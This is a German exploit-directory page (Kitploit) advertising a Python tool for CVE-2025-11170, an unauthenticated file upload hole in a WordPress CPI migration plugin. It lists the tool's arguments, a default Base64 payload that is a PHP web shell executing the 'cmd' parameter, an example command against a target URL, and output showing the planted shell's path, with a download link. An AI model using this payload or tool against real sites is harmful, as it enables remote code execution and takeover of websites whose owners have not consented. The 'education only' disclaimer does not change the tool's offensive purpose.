Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-11170 — WP-Migrations-Plugin für CPI <= 1.0.2 – Beliebiger Datei-Upload ohne Authentifizierung | Kitploit
Tools/GitHubGitHub/nxploited/cve-2025-11170
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & Bildung
GitHubnxploited/cve-2025-11170

CVE-2025-11170

WP-Migrations-Plugin für CPI <= 1.0.2 – Beliebiger Datei-Upload ohne Authentifizierung

Repository anzeigen
2vor 10 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-11170

WP移行専用プラグイン for CPI <= 1.0.2 - Unaauthentifizierter Upload beliebiger Dateien

🚀 WP移行専用プラグイン for CPI <= 1.0.2 - Unaauthentifizierter Upload beliebiger Dateien

📝 Beschreibung

Das Plugin WP移行専用プラグイン for CPI für WordPress ist anfällig für das Hochladen beliebiger Dateien, da in allen Versionen bis einschließlich 1.0.2 die Dateityp-Validierung in der Funktion Cpiwm_Import_Controller::import fehlt.
Dadurch können nicht authentifizierte Angreifer beliebige Dateien auf den Server der betroffenen Website hochladen, was möglicherweise die Ausführung von Remote-Code ermöglicht.

🛡️ Schwachstellendetails

  • CVE: CVE-2025-11170
  • CVSS-Score: 9.8 (Kritisch)
  • Angriffsvektor: Nicht authentifizierter Remote-Datei-Upload

⚡ Skript-Info

  • Skriptname: CVE-2025-11170.py
  • Zweck: Automatisierter Shell-/Datei-Upload-Exploit für das anfällige WordPress-CPI-Migrationsplugin.
  • 🔧 Verwendung

    Argumente

    ArgumentBeschreibung
    -u, --urlBasis-Ziel-URL (z. B. http://target.com/wordpress/). Das Skript hängt wp-admin/admin-ajax.php automatisch an.
    -f, --filenameName der Shell oder Datei, die hochgeladen werden soll. Standard: shell.php
    -d, --dataDateiinhalt in Base64 (oder Rohtext). Standard: PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ID8+
    -i, --indexWert des Indexfelds. Standard: 0
    -H, --headersZusätzliche HTTP-Header (Format: X-Key:Value;K2:Value2)
    -t, --timeoutTimeout für HTTP-Anfrage (Sekunden). Standard: 10
    --retriesAnzahl der Wiederholungsversuche. Standard: 3
    --backoffBackoff-Faktor zwischen Wiederholungen (Sekunden). Standard: 0.7
    -v, --verboseErhöht die Ausführlichkeit für Debugging (wiederholbar)

    🚦 Erläuterte Methoden

    • Nxploited_parse_args
      Parst und validiert Eingabeargumente. Stellt die korrekte Endpunktstruktur, Header und Datenkodierung sicher.

    • Nxploited_logging
      Richtet erweitertes Logging und Ausführlichkeit für eine detaillierte oder minimale Laufzeitausgabe ein.

    • Nxploited_retry_session
      Initialisiert eine persistente Sitzung mit Wiederholungs- und Backoff-Logik für eine robuste Kommunikation.

    • Nxploited_build_payload
      Erstellt die POST-Anfrageparameter für den Exploit.

    • Nxploited_send
      Führt die eigentliche POST-Anfrage an den anfälligen Endpunkt aus und verwaltet Antworten/Fehler.

    • Nxploited_output_result
      Verarbeitet und formatiert die Antwort und zeigt bei Erfolg den Shell-Pfad an, andernfalls Debug-Informationen.


    💡 Beispielverwendung

    root@kitploit:~
    python3 CVE-2025-11170.py -u "http://192.168.100.74:888/wordpress/" -f "shell.php"
    

    Beispielausgabe:

    root@kitploit:~
    Uploading shell...
    Processing response...
    [+] Upload successful!
    Shell path:
    http://192.168.100.74:888/wordpress/wp-content/plugins/cpi-wp-migration/storage/shell.php
    Nxploited
    My GitHub: https://github.com/Nxploited
    

    🚨 Haftungsausschluss

    Dieses Skript wird nur zu Bildungszwecken bereitgestellt.
    Die Verwendung dieses Exploits gegen Ziele ohne entsprechende Genehmigung kann illegal sein.
    Der Autor übernimmt KEINERLEI Verantwortung für Missbrauch, Schäden oder rechtliche Konsequenzen.


    📢 Kontakt

    GitHub: Nxploited
    Telegram: KNxploited


    Von: Nxploited ( Khaled Alenazi )

    Tool herunterladen